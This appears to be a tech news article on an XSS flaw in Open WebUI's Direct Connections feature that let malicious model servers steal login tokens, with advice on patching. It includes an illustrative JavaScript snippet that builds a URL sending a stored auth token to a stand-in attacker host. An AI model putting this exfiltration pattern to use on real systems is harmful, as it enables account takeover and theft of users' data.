A Major Open WebUI Flaw Could Have Let Hackers Steal Your AI Chats


According to Infosecurity Magazine, a high-severity security vulnerability has been uncovered in Open WebUI, the popular open-source interface for AI models. The flaw, tracked as CVE-2025-64496 and discovered by Cato Networks, impacts versions 0.6.34 and older when the Direct Connections feature is enabled. It carries a severity rating of 7.3 out of 10 and was reported to maintainers in October 2025. The bug was publicly disclosed on November 7, 2025, after patch validation. The core risk is account takeover, where an attacker could steal authentication tokens and gain full access to a user’s chats, documents, and API keys.


The Trust Problem With AI Connections

So here’s the thing. Open WebUI’s Direct Connections feature is super useful. It lets you point the interface at your own self-hosted AI model server or any OpenAI-compatible endpoint. But that flexibility comes with a huge, often overlooked assumption: you have to trust that external server completely. This vulnerability proves that assumption can be costly. The flaw was in how the browser handled event messages from that server. A malicious server could send a crafted message that would execute JavaScript in your browser, a classic cross-site scripting (XSS) pattern. Basically, by tricking you into connecting to a bad server, an attacker could rifle through your browser’s localStorage and steal your login tokens. Game over.
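To make the attack class concrete, here is a minimal illustrative sketch, not Open WebUI’s actual code. It assumes a hypothetical storage key name ("token") and an attacker-controlled host, and uses a plain Map to stand in for the browser’s localStorage. The point is simply that any script running in the page context can read the same token the app stored there:

```javascript
// Illustrative sketch of the attack class (NOT the real exploit or app code).
// A stand-in for the browser's localStorage; the key name "token" and the
// token value are hypothetical.
const fakeLocalStorage = new Map([["token", "eyJhbGciOi..."]]);

// What injected JavaScript could do once it runs in the victim's page:
// read the auth token and smuggle it out, e.g. as a query parameter on a
// request to an attacker-controlled host.
function buildExfilUrl(storage, attackerHost) {
  const token = storage.get("token");
  return `https://${attackerHost}/collect?t=${encodeURIComponent(token)}`;
}

console.log(buildExfilUrl(fakeLocalStorage, "evil.example"));
```

With the token in hand, the attacker can replay it against the real backend and take over the account, which is why the CVE is rated as high severity.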

Beyond The Patch, What’s Left?

Now, the good news is the patch in version 0.6.35 seems effective. It blocks those malicious “execute” events. But let’s be real—patching the software is only the first step. The researchers at Cato Networks point out that organizations need to do more. They need stronger authentication, better sandboxing for extensible features, and stricter resource access controls. This is a classic case of closing one door while realizing your whole security model has too many windows open. It also highlights a massive challenge for any tool that becomes a “hub” for connecting to other services. How do you enable powerful integrations without handing over the keys to the kingdom?
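The general shape of the mitigation described above can be sketched like this. This is a hedged illustration of the pattern, not the actual 0.6.35 patch, and the event type names are hypothetical: treat every event from an external model server as untrusted, and only act on an explicit allowlist of safe types.

```javascript
// Sketch of the mitigation pattern: allowlist event types from an
// untrusted external server. Event type names here are hypothetical.
const SAFE_EVENT_TYPES = new Set(["message", "status", "done"]);

function handleServerEvent(event) {
  // Anything not explicitly allowlisted -- notably an "execute"-style
  // event that could trigger code execution -- is dropped, not run.
  if (!SAFE_EVENT_TYPES.has(event.type)) {
    return { handled: false, reason: `blocked event type: ${event.type}` };
  }
  return { handled: true };
}
```

A deny-by-default allowlist like this is the safer design choice: new event types added by a malicious or compromised server are inert until the client explicitly opts in.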

A Wake-Up Call For Self-Hosted AI

This whole episode is a fascinating stress test for the self-hosted AI ecosystem. Everyone’s rushing to deploy their own local or private cloud models, and tools like Open WebUI are the friendly face on that complexity. But we often forget that “self-hosted” doesn’t automatically mean “secure.” You’re still stitching together different components, and the chain is only as strong as its weakest link—which, in this case, was the trust mechanism between the UI and the model server. It makes you wonder, how many other similar tools have features built on similarly shaky ground? The fix is out, so update immediately if you’re running Open WebUI. But the bigger lesson is about architectural trust. In the race for AI flexibility, security can’t be an afterthought.
